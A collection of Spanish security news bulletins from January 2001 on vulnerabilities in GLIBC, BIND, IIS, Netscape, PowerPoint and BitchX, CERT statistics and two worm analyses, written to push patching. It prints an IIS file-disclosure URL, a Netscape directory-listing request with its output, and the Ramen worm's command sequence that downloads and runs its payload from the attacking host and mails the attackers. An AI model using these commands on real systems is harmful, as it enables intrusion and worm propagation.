miércoles, 31 de enero de 2001

HotMail con problemas frente a los virus

Según anuncia la prestigiosa publicación online ZDNet, HotMail
presenta graves deficiencias en la detección de virus, todo indica que
el motor antivirus con que cuenta el popular entorno de correo e-mail
gratuito lleva seis meses sin actualizarse.
Según indica ZDNet el escaner antivirus de Hotmail se muestra incapaz
de detectar una virus como Emmanuel, todo indica que este filtro lleva
seis meses sin ningún tipo de actualización. Al contactar con
Microsoft y McAfee respecto a la vulnerabilidad encontrada en los
servidores de Hotmail, la firma antivirus indicó que se trataba de un
fallo de Microsoft, que la firma de Redmon rehusaba realizar la
implementación de las nuevas actualizaciones.

En la actualidad, seis días después de que el problema fuera reportado
a los técnicos de Microsoft, el problema sigue sin corregir. El
escaner antivirus de HotMail no intercepta el virus Emmanuel. El
problema radica en que igual que HotMail no detecta este virus, no
detecta virus, gusanos y troyanos que hayan aparecido en los últimos
seis meses, con el problema que ello conlleva.

La versión del software de McAfee que detecta el virus Emmanuele es la
numerada como 4.15 y fue publicada el pasado noviembre. De acuerdo a
declaraciones de Sal Viveros, portavoz de Network Associates y McAfee en
Europa, desde que HotMail pasó a formar parte de Microsoft los técnicos
de HotMail nunca se han mostrado muy dispuestos a realizar las
actualizaciones del software necesarias.



Antonio Ropero
antonior@hispasec.com


Más información:

ZDNet
http://www.zdii.com/industry_list.asp?mode=news&doc_id=ZD2679292
http://www.zdnet.com/zdnn/stories/news/0,4586,2679292,00.html


martes, 30 de enero de 2001

Actualización recomendada de la GLIBC

Las versiones actuales de GLIBC son vulnerables a numerosos ataques
locales.
GLIBC es la librería estándar C desarrollada por GNU. Se trata de la
librería básica empleada por cualquier programa en C que utilice
funciones estándar, como "printf()" o "strcmp()". Podría decirse, por
lo tanto, que casi cualquier programa UNIX utiliza la librería LIBC,
de una forma u otra (incluso los programas en lenguajes interpretados,
como python o perl utilizan la LIBC, ya que su implementación está
en C). Existen varias implementaciones de LIBC, entre ellas la de GNU,
que es la que nos ocupa en este boletín.

Algunos de los problemas y vulnerabilidades encontrados son:

- Carga de librerías dinámicas no autorizadas en procesos SETUID.
- Limpieza incorrecta de diversas variables de entorno, en
procesos SETUID.
- Lectura de ficheros arbitrarios.
- Problemas en arquitecturas Alpha.
- Problemas con RPC bajo kernel Linux 2.4.x.
- Creación o sobreescritura de ficheros.
- ataques "symlink" al hacer "profiling" de una aplicación.

Se recomienda revisar los webs de seguridad de las distintas
distribuciones, para verificar la existencia de las actualizaciones
correspondientes.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Glibc Local Root Exploit
http://www.securityfocus.com/archive/1/155352

glibc file read or write access local vulnerability
http://www.redhat.com/support/errata/RHSA-2001-001.html

[slackware-security] glibc 2.2 local vulnerability on setuid binaries
http://www.slackware.com/lists/archive/viewer.php?l=slackware-security&y=2001&m=slackware-security.286413

glibc
http://download.immunix.org/ImmunixOS/6.2/updates/IMNX-2000-62-044-01

glibc
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-012.php3

glibc security problems
http://www.calderasystems.com/support/security/advisories/CSSA-2001-007.0.txt

Trustix Secure Linux 1.2, Errata
http://www.trustix.net/errata/trustix-1.2/

Graves problemas en la GLIBC
http://www.hispasec.com/unaaldia.asp?id=692



lunes, 29 de enero de 2001

Microsoft publica el parche para el problema de los htr

Hace tres semanas informábamos de un nuevo descubrimiento de Georgi
Guninski, en el cual se hacía eco de una extensión de un problema
anteriormente solucionado por Microsoft, y que permitía la
visualización de archivos con scripts. Tres semanas después Microsoft
publica la solución para este problema que ha dejado miles de sitios
web desprotegidos ante todo tipo de ataques.
El problema relatado por Guninski permitía la visualización de páginas
con código en perl, cgis, o el archivo global.asa que generalmente
contiene el nombre de usuario y password para acceder a la base de
datos de la aplicación. Por ello, el problema podía considerarse de
bastante gravedad.

Además, la sencillez con que se podía llevar a cabo el ataque elevaba
aun más el riesgo. Una simple URL de la forma
http://www.servidor.afectado.com/global.asa%3F+.htr permitía al
atacante acceder a los datos del archivo indicado.

Este fallo de seguridad, relacionado con el tratamiento de archivos
.htr está causando graves problemas a los administradores de webs con
IIS, un hecho que constata esta realidad es que con el actual,
Microsoft se ha visto obligada a publicar tres boletines de seguridad
(y los correspondientes parches). Recomendamos a todos los
administradores la instalación de esta actualización de forma
inmediata, ya que como hemos explicado los problemas ocasionados por
este fallo son de elevada gravedad.

Microsoft publica las actualizaciones necesarias para solucionar y
evitar este problema que pueden encontrarse en las siguientes
direcciones:

Actualización para IIS 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27492

Actualización para IIS 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27491



Antonio Ropero
antonior@hispasec.com


Más información:

Visualización de archivos en Internet Information Server
http://www.hispasec.com/unaaldia.asp?id=805

Boletín de seguridad Microsoft (MS01-004)
http://www.microsoft.com/technet/security/bulletin/ms01-004.asp

Preguntas y respuestas de Microsoft en relación al problema
http://www.microsoft.com/technet/security/bulletin/fq01-004.asp

Georgi Guninski (Aviso Original)
http://www.guninski.com/iishtr.html



domingo, 28 de enero de 2001

Vulnerabilidades en BIND

Las versiones de BIND anteriores a la 8.2.3 contienen diversas
vulnerabilidades graves, como el permitir la ejecución de código
arbitrario en el servidor.
BIND (también conocido como "named") es el servidor de nombres DNS más
utilizado en Internet, con diferencia. Se trata de un producto que se
distribuye con código fuente y de forma gratuita. Aunque su versión
nativa en UNIX (funciona en casi todo Unix imaginable incluyendo el
nuevo "OS X" de Apple), puede compilarse también para entornos
Windows.

Las versiones anteriores a la 8.2.3 contienen diversas
vulnerabilidades con diferentes niveles de importancia. Una de ellas,
no obstante, posibilita la ejecución de código remoto arbitrario en el
servidor, algo extremadamente grave. El problema se localiza en el
módulo TSIG (transaction Signature).

La recomendación es actualizar a BIND 8.2.3, o a la serie 9.x.x
(actualmente 9.1.0), con la mayor brevedad posible. La serie 9.x.x no
está afectada por estas vulnerabilidades.



Jesús Cea Avión
jcea@hispasec.com


Más información:

ISC BIND
http://www.isc.org/products/BIND/

BIND 8.2.3
ftp://ftp.isc.org/isc/bind/src/8.2.3/

CERT Advisory CA-2001-02 Multiple Vulnerabilities in BIND
http://www.cert.org/advisories/CA-2001-02.html



sábado, 27 de enero de 2001

Nuevos estándares criptográficos en Europa: El proyecto NESSIE

NESSIE son las siglas de New European Schemes for Signatures,
Integrity and Encryption, un proyecto nacido el pasado año y
financiado por la Comunidad Económica Europea dentro del programa IST
(Information Societes Technology). En él participan instituciones
tan prestigiosas como el Royal Holloway de la Universidad de Londres,
Siemens AG, la École Normale Supérieure, la Katholieke Universiteit
Leuven (Bélgica), Technion (Israel Institute of Technology) y la
Universitetet i Bergen (Noruega).
Objetivos

El proyecto NESSIE nace no mucho después del AES estadounidense,
inspirándose en su filosofía pero con objetivos mucho más ambiciosos.
No se trata tan sólo de buscar, como en el caso del AES, un algoritmo
de cifrado simétrico que pueda ser elevado a la categoría de estándar
internacional, sino que esta búsqueda de algoritmos criptográficos se
extiende también a cifradores en flujo, códigos de autenticación de
mensajes, funciones resumen irreversibles robustas frente a
colisiones, algoritmos de cifrado asimétrico, esquemas de firma
digital y algoritmos de identificación. También se solicitaban nuevas
metodologías de evaluación que ayudasen a escoger entre la gran
cantidad de propuestas que se preveía recibir.

Otros objetivos declarados son: conseguir un conjunto de primitivas
criptográficas de probada robustez y fiabilidad que hayan superado con
éxito un exigente proceso abierto y público de evaluación y análisis,
difundir sus resultados tan ampliamente como sea posible e impulsar la
posición de la investigación europea en criptografía.

Nuevas propuestas

Para conseguir estos objetivos se realizó una llamada a la comunidad
científica internacional, intentando que sus miembros propusieran
nuevos algoritmos criptográficos. Esta primera fase de recepción de
propuestas se inició en marzo de 2000 y se cerró el pasado septiembre.
Tuvo un éxito muy notable: se recibieron 17 algoritmos de cifrado en
bloque, 6 algoritmos de cifrado en flujo, 2 algoritmos de
autenticación de mensajes, una función hash, 5 esquemas de cifrado
asimétrico, 7 esquemas asimétricos de firma digital, uno de
identificación asimétrica y una metodología de análisis.

Participación internacional

A pesar de tratarse de un proyecto con financiación exclusivamente
europea que busca el desarrollo de nuevos estándares europeos, y al
igual que en el caso del AES, ésta solicitud de nuevos algoritmos
criptográficos estaba abierta a toda la comunidad científica. De
hecho, resultó ser muy numerosa la participación japonesa: en Japón,
prácticamente todas las empresas importantes desarrollan sus propios
algoritmos de cifrado para uso interno, que normalmente luego ofrecen
gratuítamente, promoviendo así un caldo de cultivo excelente para la
investigación criptográfica. Además de Japón, también se recibieron
propuestas desde Australia, E.E.U.U., Noruega, Bélgica, España,
Francia, Suiza y Brasil.

Fases de NESSIE

Todas estas propuestas fueron defendidas en público en el First NESSIE
Workshop, que se celebró entre el 13 y 14 de septiembre pasados en la
Katholieke Universiteit Leuven. Después de este First NESSIE Workshop
se ha abierto un primer periodo de estudio exhaustivo de los
algoritmos propuestos cuyas conclusiones deben presentarse en
septiembre de 2001 en el Second NESSIE Workshop. Tras esta fase,
aproximadamente en febrero de 2002, se hará la primera selección de
finalistas. Luego se celebrará el Third NESSIE Workshop en septiembre,
tras el cual se producirá la selección definitiva cuyas conclusiones
deben conocerse en diciembre de 2002.

Quizá quepa criticar levemente estos plazos tan ajustados ya que los
plazos del AES eran más generosos y fueron considerados insuficientes
por algunos autores. Esto podría impedir un correcto análisis de los
finalistas y, por tanto, implica un riesgo de que alguno de los
algoritmos vencedores sea criptoanalizado poco después de ser
propuesto como estándar europeo.

Los mejor colocados

En Leuven los autores de cada una de los algoritmos defendieron, a
veces incluso vehementemente, las bondades de sus propuestas. Aunque
había muchas caras conocidas entre el público asistente, fueron
especialmente felicitados Vicent Rijmen y Joan Daemen, que
recientemente habían visto como su algoritmo Rinjdael se había
convertido en el AES. Su nueva propuesta como algoritmo de cifrado en
bloque para NESSIE se denomina Noekeon y fue uno de los algoritmos que
mejor impresión causó entre los asistentes. Probablemente volveremos a
oir hablar de él en un futuro próximo.

Otros algoritmos simétricos con posibilidades de ser elegidos son Q y
SAFER++. En cuanto a los cifradores de flujo, parece que BMGL,
Lili-128 y SNOW tienen más posibilidades que el resto de las
propuestas. Entre los cifradores asimétricos EPOC y PSEC, ambos de la
Nippon Telegraph and Telephone Corporation, y RSA-OAEP causaron buena
impresion. Hay otras categorías con sólo un candidato, donde por
tanto, éste será el elegido a menos que queden desiertas. El resto
están demasiado abiertas como para poder aventurar un pronóstico. Al
igual que en el caso del AES los ganadores tendrán que renunciar a las
patentes sobre sus algoritmos.



Julio César Hernández
Grupo de Seguridad
Universidad Carlos III de Madrid
jcesar@hispasec.com



viernes, 26 de enero de 2001

Ficheros al descubierto en LocalWEB2000 v1.1.0.

LocalWEB2000 es un servidor HTTP para Windows que se ve afectado por
una conocida vulnerabilidad, la cual permite visualizar cualquier
fichero del sistema de forma remota desde un simple navegador.
Este servidor web está diseñado en principio para entornos de intranet
de pequeño tamaño, la vulnerabilidad permite que un atacante pueda
conseguir acceso de lectura a cualquier archivo del servidor con
nombre y trayectoria conocida.

El problema reside una vez más en la posibilidad de emplear la cadena
"../" para subir niveles de directorios fuera del ámbito público del
web.

Esta vulnerabilidad genera un grave peligro para la integridad de
los sistemas que empleen este servidor, ya que podrá ser empleado
para obtener la suficiente información del sistema (archivos de
configuración, passwords, etc.) como para posibilitar el compromiso
total del sistema.



Antonio Román
antonio_roman@hispasec.com


Más información:

LocalWEB2000
http://www.intranet-server.co.uk/

LocalWEB2000 Directory Traversal Vulnerability
http://www.securityfocus.com/bid/2268



jueves, 25 de enero de 2001

Listado de directorios con Netscape Enterprise Server

Netscape Enterprise Server es un servidor web que se emplea comúnmente
en grandes corporaciones y entornos de grandes requisitos. Existe una
característica que se instala por defecto que puede permitir a un
atacante obtener el listado de archivos de un directorio.
El servidor web de Netscape incluye la característica Web Publishing
(Publicación Web) que se instala y habilita por defecto al realizar la
instalación de la aplicación. Si esta opción se encuentra activada
un usuario remoto podrá lograr visualizar los contenidos de cualquier
directorio del web.

Si el atacante se conecta por telnet al puerto por el que opera Netscape
Enterprise Server y realiza la petición "INDEX / HTTP/1.0" provocará que
el servidor muestre un listado completo del contenido del directorio
especificado. De la siguiente forma:

Trying 192.168.1.1...
Connected to www.example.org.
Escape character is `^]´.
INDEX / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain

test directory 512 979859452 0 null null
images directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
admin directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null

Si esta vulnerabilidad se logra explotar con éxito podrá facilitar al
atacante la obtención de información sensible y posibilitar el
realizar un ataque mucho más elaborado.



Antonio Ropero
antonior@hispasec.com


Más información:

Securityfocus
http://www.securityfocus.com/vdb/bottom.html?vid=2285

Bugtraq
http://www.securityfocus.com/archive/1/158099



miércoles, 24 de enero de 2001

Los incidentes de seguridad se doblan en un año

Los dos equipos de atención a incidentes de seguridad en España,
IRIS-CERT y esCERT, la llamada "policía de Internet", han detectado en
el último año un destacable aumento de los intentos de acceso ilegal a
ordenadores. Casi la mitad habrán quedado por resolver. A pesar de
haberse doblado las incidencias respecto a 1999, los expertos huyen de
alarmismos y lo achacan al general crecimiento de la red.
A estas alturas, algo como los escaneos de puertos, que recaban
información para entrar en una máquina, se han convertido ya en un
"ruido" más de Internet, al estilo del correo basura. Para
comprobarlo, sólo es necesario instalarse un cortafuegos personal e
indicarle que genere un aviso cada vez que alguien busque agujeros en
el ordenador. Le llegarán decenas. Y no tiene porqué ser nada
personal: cualquiera puede estar, ahora mismo, poniendo en marcha un
robot escaneador contra miles de conexiones desconocidas, sólo por
probar.

"Al igual que ocurre en Internet, en la red académica y de
investigación nacional el incremento de incidentes es cada vez mayor",
explica Chelo Malagón, del IRIS-CERT (Computer Emergency Response Team
de RedIRIS). Si en 1999 el número de casos en universidades y centros
subió un 50% (240 incidentes), las cifras del 2000 son más del doble
(490). Por suerte, la mayoría (el 67%) fueron sólo tentativas aisladas
de acceso, como el escaneo de puertos, de baja prioridad.

También en el esCERT de la Universitat Politècnica de Catalunya, que
da servicio a empresas y organismos, ha aumentado el trabajo. De
atender 39 incidentes en 1999 han pasado a los 64 del año 2000,
"principalmente, por el incremento de los escaneos y porque ahora las
empresas están mejor preparadas y pueden detectarlos más", afirma
Jordi Linares, del esCERT. También en las universidades los escaneos
de puertos (180), de redes (20) y de DNS (33) han sido protagonistas,
llegándose a ver, como cuentan, "no solamente informes que alertan de
la instalación de un troyano sinó escaneos de atacantes intentando
detectar si alguno de estos troyanos ha sido instalado previamente en
una máquina".

Las entradas a sistemas subieron también en el 2000, pero bajó el
saber hacer de los atacantes, dice Linares: "Aunque el número de
accesos ilegales ha aumentado, el número de compromisos de
administrador ha bajado, igual que el número de "rootkits" (programas
para hacerse con el control) instalados. Ahora es más habitual la
suplantación de personalidad, que roben la contraseña de un usuario".
Los ataques de denegación de servicio son también frecuentes. "En
cuanto a los DDoS (Distributed Denial of Service -denegación de
servicio desde varios puntos-), que tanta alarma social han causado,
la infraestructura de nuestra red ha permitido detectarlos de forma
casi inmediata, aunque el número ha sido elevado", destaca Malagón.

De todas formas, estas cifras no tienen mucho que ver con la verdad,
como avisa la representante del IRIS-CERT: "Con toda seguridad el
número real de incidentes sea mucho más elevado, puesto que en muchas
ocasiones no se declaran por temor a la mala imagen. Además, los
ataques desde el interior, que constituyen un porcentaje muy elevado,
no se suelen reportar por razones similares". Lo que no cambia, año
tras año, son las causas de estos problemas, que enumera Malagón: "La
existencia de equipos sin actualizar y el elevado número de equipos
sin administrar, sobre los que no se lleva ningún control". Mayor
inversión y conscienciación sobre seguridad son, dice, la única
solución.

Incidentes de seguridad año 2000

esCERT
Escaneos o intentos de entrada.. 33
Accesos ilegales a máquinas .... 19
Correo basura .................. 5
Denegaciones de servicio........ 3
Otros........................... 4

total...........................64

IRIS-CERT
Escaneos o intentos de entrada.. 268
Correo basura................... 74
Accesos ilegales a máquinas..... 61
Denegaciones de servicio........ 24
Troyanos........................ 14
Otros........................... 46

total........................... 490

Incidentes de seguridad año 1999

esCERT
Accesos ilegales a máquinas..... 14
Escaneos o intentos de entrada.. 8
Denegaciones de servicio........ 3
Correo basura ("spam").......... 3
Otros (amenazas, uso fraudulento de VISAs, programas piratas).. 11

TOTAL. 39

IRIS-CERT (Hasta noviembre)
Prioridad baja (intentos aislados) ........................ 94
Prioridad normal (accesos a redes y escaneo insistente) ... 30
Prioridad alta (acceso como administrador y deneg de serv). 38
Correo basura ............................................. 78

TOTAL. 240



Mercè Molist
CiberPaís


Más información:

CiberPaís
http://www.ciberpais.elpais.es/

IRIS-CERT
http://www.rediris.es/cert

esCERT
http://escert.upc.es



martes, 23 de enero de 2001

Desbordamiento de bufer con Microsoft PowerPoint 2000

PowerPoint 2000 es la aplicación de Microsoft que se emplea
habitualmente para la realización de presentaciones, se ha
descubierto una vulnerabilidad de desbordamiento de bufer en el módulo
de carga de archivos que puede permitir a un atacante la ejecución de
código en el sistema.
Esta vulnerabilidad en PowerPoint 2000 radica en las rutinas
encargadas del tratamiento que se realiza cuando se carga un archivo
en la aplicación. La existencia de un búfer sobre el que no se
realizan las oportunas comprobaciones, permitirá al atacante
introducir un gran número de datos en él y provocar el ya clásico
desbordamiento y sus temidos efectos.

El efecto puede ser aun mayor ya que Internet Explorer confía en
PowerPoint, lo que permite incrustar un archivo PowerPoint en una
página web. De esta forma al visualizar dicha página, el archivo se
interpreta de forma automática lo que deja al usuario vulnerable. Esta
vulnerabilidad también se puede reproducir mediante un mensaje de
correto electrónico con formato html.

Microsoft ha publicado un boletín y un parche para informar y corregir
esta vulnerabilidad, que como efecto menor causa el cuelgue de
PowerPoint, aunque un atacante experto podrá explotar la vulnerabilidad
para lograr la ejecución de código en la máquina que visualiza el
archivo, y de esta forma podrá llegar a tomar el control del sistema.

Otro punto de vista sobre este problema puede venir en los ASP
(Application Service Providers) que comúnmente se empiezan a
popularizar. Una de las medidas habituales de defensa consiste en el
uso de las capacidades nativas de Windows 2000 para que determinados
usuarios sólo puedan ejecutar ciertos programas (como la suite Office)
bajo una jaula. Este ataque proporciona una vía de ejecución de código
arbitrario en el servidor del ASP, bastará con subir el archivo
PowerPoint malicioso y cargarlo para conseguir comprometer dicha
máquina, con el consiguiente riesgo para el proveedor.



Antonio Ropero
antonior@hispasec.com>


Más información:

Atstake
http://www.atstake.com/research/advisories/2001/a012301-1.txt

Microsoft. Boletín de seguridad (MS01-002)
http://www.microsoft.com/technet/security/bulletin/MS01-002.asp

Parche para evitar el problema
http://officeupdate.microsoft.com/2000/downloaddetails/ppt2ksec.htm



lunes, 22 de enero de 2001

Ejecución remota de código en BitchX

Las versiones de BitchX anteriores a la 1.0c18 permiten la ejecución
remota de código en la máquina del cliente, debido a un problema de
desbordamiento de búfer en la gestión de las respuestas DNS.
BitchX es un cliente de IRC muy popular en el entorno Unix
(particularmente, en Linux y *BSD). Las versiones previas a la 1.0c18
son susceptibles a un ataque de desbordamiento de búfer que permite
ejecutar código arbitrario en la máquina del usuario que emplea el
cliente.

El problema se localiza en la gestión de las respuestas DNS. Un
servidor DNS malicioso puede injectar al cliente (previa petición por
su parte, acción que se puede inducir a través de IRC) una respuesta
ilegal especialmente formateada. Dicha respuesta puede abortar la
ejecución del cliente o, en algunos casos, permite la ejecución de
código malicioso contenida en la respuesta.

Se recomienda actualizar a la versión 1.0c18 o superior.



Jesús Cea Avión
jcea@hispasec.com


Más información:

BitchX
http://www.bitchx.org/

bitchx/ko-bitchx allows remote code execution [REVISED]
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00%3A78.bitchx.v1.1.asc

Falha no processamento de respostas a consultas DNS
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000364

BitchX
http://www.linux-mandrake.com/en/security/2000/MDKSA-2000-079.php3?dis=7.2



domingo, 21 de enero de 2001

Un gusano muy activo afecta a sistemas Linux de todo el mundo

En los últimos días ha surgido en la red un gusano que ya se encuentra
in the wild. Ramen, nombre que recibe este nuevo patógeno, afecta a
sistemas RedHat 6.2 y RedHat 7.0 aprovechándose de vulnerabilidades
conocidas desde hace tiempo y con parches para ellas en los servicios
rpc, wuftp o LPRng.
Este nuevo gusano ha pillado desprevenida a toda la comunidad Linux,
que no esperaba nada semejante y siempre ha permanecido convencida de
la seguridad de sus sistemas frente a virus y gusanos que tanto
afectan en la actualidad a los sistemas Windows. Pero en esta ocasión,
una elaborada y efectiva colección de herramientas destinadas a
explotar vulnerabilidades ha conseguido poner en jaque a los sistemas
Linux de todo el mundo.

Es falso que no existen virus o gusanos para Linux o Unix, pero en la
actualidad la propia arquitectura de Windows se presenta como una
plataforma más vulnerable ante el ataque de virus en comparación con
la robustez que pueden alcanzar los sistemas Unix convenientemente
administrados. Sin embargo, Ramen representa un serio toque de
atención tanto a la comunidad Unix como a las propias casas antivirus,
que a partir de ahora deberán prestar mayor atención a posibles brotes
de este tipo de especímenes.

Ramen afecta a sistemas RedHat Redhat 6.2 a través de un servicio rpc
explotable o de un wuftpd vulnerable, para los sistemas RedHat 7.0 el
gusano infecta haciendo uso de una vulnerabilidad en LPRng. A su paso,
el gusano deja un rastro de páginas web modificadas en los servidores
atacados, con un gráfico en el que se hace alusión a los tallarines
orientales de marca Ramen. En la página modificada el gusano también
deja la frase "Hackers looooooooooooove noodles," y aparece firmado
como "RameN Crew". Ya han aparecido hasta servidores de la NASA con
esta huella que da signos evidentes del paso del gusano por el
sistema.

Ramen realiza un escaneo de clases B mediante una exploración SYN
consistente en una versión modificada de synscan. Esta exploración
puede llevar entre 15 y 25 minutos y pretende localizar sistemas
Redhat 6.2 o 7.0. Durante el rastreo Ramen comprueba el anuncio del
tipo de servidor de FTP, sólo comprueba el puerto 21 para esto, si
aparece la cadena "Mon Feb 28" grabará la IP y/o el nombre de host en
el archivo ".w". En cambio, si encuentra la cadena "Wed Aug 9",
grabará los datos en el archivo ".l". De esta forma realiza una
clasificación de la versión de sistema operativo, RedHat 6.2 en el
primer caso y 7.0 en el segundo.

Tras esto se lanzarán dos scripts diferentes dependiendo de cada
sistema contra las direcciones de dichos archivos. Contra las máquinas
RedHat 6.2 empleará la lista del archivo ".w" ejecutará primero un
exploit contra el wu-ftpd, tras este ataque se ejecutará un exploit
contra rpc.statd en la máquina objetivo. En caso de lograr su objetivo
ejecutará la siguiente secuencia de comandos:

mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! : mail -s TOADDR -c gb31337@hotmail.com
gb31337@yahoo.com

Destinada a enviar un mensaje con las direcciones de la máquina desde
la que se lanza el ataque y la nueva máquina infectada. El mail se
envía a las direcciones gb31337@hotmail.com y gb31337@yahoo.com

Para atacar a los sistemas con RedHat 7 Ramen emplea un ataque contra
LPRng. Este programa es una implementación de una utilidad de spool de
impresora.

Una vez en el sistema el gusano establece un pequeño servidor HTTP/0.9
en el puerto 27374 que se emplea para servir copias de si mismo al
exterior (esto se realiza a través de inetd en RedHat 6.2 y xinetd en
RedHat 7.0). para reproducirse a si mismo, determina la dirección IP
y elima los servicios vulnerable que le han servido para introducirse
en el sistema. Es decir, en RedHat 6.2 eliminará rpc.statd y en
RedHat 7.0 lpd. De forma adicional añadirá los usuarios "ftp" y
"anonymous" al archivo /etc/ftpusers para cerrar el agujero en
wu-ftpd. Para finalizar modificará todos los archivos index.html por
la página anteriormente descrita.

Para evitar la infección por este gusano es conveniente actualizar los
sistemas RedHat. Todas los parches necesarios para cubrir las
vulnerabilidades descritas se encuentran disponibles en el sitio web
de RedHat. Hay que aclarar, como ya hemos comentado, que los parches
no son específicos para este gusano, sino que cierran vulnerabilidades
detectadas y solucionadas hace tiempo.

Desde Hispasec una vez más recordamos y recomendamos la necesidad de
mantener los sistemas actualizados, labor que deben realizar tanto los
administradores de sistemas en las empresas como los usuarios en sus
equipos domésticos.



Antonio Ropero
antonior@hispasec.com


Más información:

Descripción de Ramen
http://members.home.net/dtmartin24/ramen_worm.txt

Vulnerabilidad en wu-ftp (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1387

Vulnerabilidad en rpc.statd (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1480

Vulnerabilidad en LPRng (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1712

Ramen afecta a la NASA (Securityfocus)
http://www.securityfocus.com/templates/article.html?id=141

Silicon.com
http://www.silicon.com/public/door?REQUNIQ=979925654&6004REQEVENT=&REQINT1=42151&REQSTR1=newsnow

Linux Today
http://linuxtoday.com/news_story.php3?ltsn=2001-01-18-006-06-SC

Computerworld
http://www.computerworld.com/cwi/stories/0,1199,NAV47-68-84-88_STO56475,00.html

CMPTR
http://www.cmptr.com/view.php?id=502



sábado, 20 de enero de 2001

Análisis del gusano "LittleDavinia"

En la última semana se han sucedido las noticias alrededor de
LittleDavinia, en unos casos destacando la peligrosidad y novedad de
este gusano capaz de infectar los sistemas con tan sólo visualizar una
página web, mientras que en otras noticias la atención se centraba en
las declaraciones de algunos desarrolladores antivirus donde se
restaba importancia al espécimen.
Desde Hispasec hemos optado por dejar al margen las rencillas de las
casas antivirus y centrarnos en el análisis de LittleDavinia, labor
algo descuidada por algunos antivirus a juzgar por sus descripciones.
Invitamos a que los lectores juzguen por si mismos el peligro
potencial que representa este tipo de gusanos, así como a realizar
cualquier otro comentario o consulta sobre este particular, a través
de la página http://www.hispasec.com/unaaldiacom.asp?id=818
Descripción

LittleDavinia está compuesto por tres módulos, una página web, un
documento de Microsoft Word 2000, y un tercer fichero escrito en
Visual Basic Script.

La página web es la encargada de descargar y abrir el documento de
Word (LD.DOC) desde un servidor de Internet. Al abrirse el documento,
sus macros se encargan de distribuir el virus a través del correo
electrónico y generar un fichero en Visual Basic Script
(LITTLEDAVINIA.VBS). Este último se ejecutará en el próximo inicio
de sistema, mostrando un ventana con un mensaje y llevando a cabo su
acción más dañina, que no es otra que borrar todos los ficheros de
las unidades existentes del sistema infectado.
Módulo 1 - La página web

La página web que originó las primeras infecciones se encontraba
hospedada en Terra (http://www.terra.es/usuarios/personal2/sergill)
y fue retirada pocas horas después de ser descubierta. Cuando un
usuario visualiza la página web infectada a través de su navegador
se pone en marcha el código que contiene escrito en JavaScript. Su
misión consiste en aprovechar una vulnerabilidad conocida de Office
2000 para desactivar la protección contra macros de Word y abrir,
sin levantar sospechas, el fichero LD.DOC hospedado en el servidor
de Internet y que contiene el resto de código vírico.

Microsoft reportó la vulnerabilidad como "Office 2000 UA Control
Vulnerability" en mayo de 2000, donde reconoce que el control ActiveX
estaba firmado erroneamente como "safe for scripting", permitiendo
que se pudiera invocar de forma remota desde una página web y acceder
a las funciones de Office 2000.
Módulo 2 - El documento de word

LC.DOC se abre gracias a la página web descrita anteriormente, el
documento Word contiene un módulo macro llamado Evil que es el
encargado de llevar a cabo las distintas acciones. En primer lugar
modifica una entrada en el registro de Windows para asegurar que en
el siguiente inicio de sistema se ejecuta el fichero LITTLEDAVINIA.VBS:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\littledavinia
[directorio de sistema]\littledavinia.vbs

A continuación escribe el fichero LITTLEDAVINIA.VBS, que lleva
almacenado en el interior del módulo macro, en el directorio de
sistema de Windows (por defecto Windows/system).

La última acción consiste en crear un objeto Outlook, y recorre toda
la libreta de direcciones para ir mandando a todos los contactos un
mensaje de correo en formato HTML a través del protocolo MAPI.

Cuando un usuario recibe un email infectado, enviado sin asunto, el
contenido HTML del mensaje abre seis nuevas ventanas del navegador
apuntando a la URL donde se encontraba la página web que inicia la
infección (módulo 1). De esta forma, sin necesidad de llevar el código
del virus o gusano adjunto al mensaje de correo electrónico, consigue
iniciar el proceso de infección de nuevos sistemas a través de la
página web que se encuentra en un servidor de Internet, ésta
descargará el documento de Word, e iniciará todo el proceso descrito
hasta ahora.

En el proceso de envío de mensajes a través del correo electrónico,
LittleDavinia utiliza una entrada del registro donde almacena
diferentes valores que le permiten recorrer todas las carpetas y
contactos de la libreta de direcciones, enviando el mensaje sólo a los
contactos donde no se hubiera realizado con anterioridad. De esta
forma LittleDavinia controla no autoenviarse de forma repetida a un
mismo contacto. La entrada que utiliza en este proceso es:

HKEY_CURRENT_USER\Software\Microsoft\WAB\
Módulo 3 - El fichero Visual Basic Script

LITTLEDAVINIA.VBS se ejecuta de forma automática en el siguiente
inicio de sistema tras la infección. Lo primero que realiza son dos
escrituras en el registro de Windows, la primera para cambiar la
página de inicio de Internet Explorer:

HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
http://

y la segunda que apunta a un fichero HTML con el nombre del virus:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Davinia
[directorio de sistema]\littledavinia.html

A continuación recorre el sistema en busca de todas las unidades,
incluidas las de red, y por cada fichero que encuentra crea un .HTML
con el mismo nombre y borra el original, lo que aparenta la
sobreescritura de dichos ficheros. Al finalizar el recorrido por todas
las unidades crea el fichero littledavinia.html en el directorio
sistema de Windows.

El contenido de los ficheros HTML que crea contiene código en Visual
Basic Script encargado de visualizar el siguiente cuadro de diálogo:

Onel2 - Melilla
Hola, tu nombre es [nombre de usuario infectado].
Tu email es [direccion de correo del usuario infectado].
Yo soy Onel2, y vivo en Melilla
una ciudad del norte de Africa.
Estoy enamorado de una chica llamada Davinia.
Ella es la mas guapa del mundo.
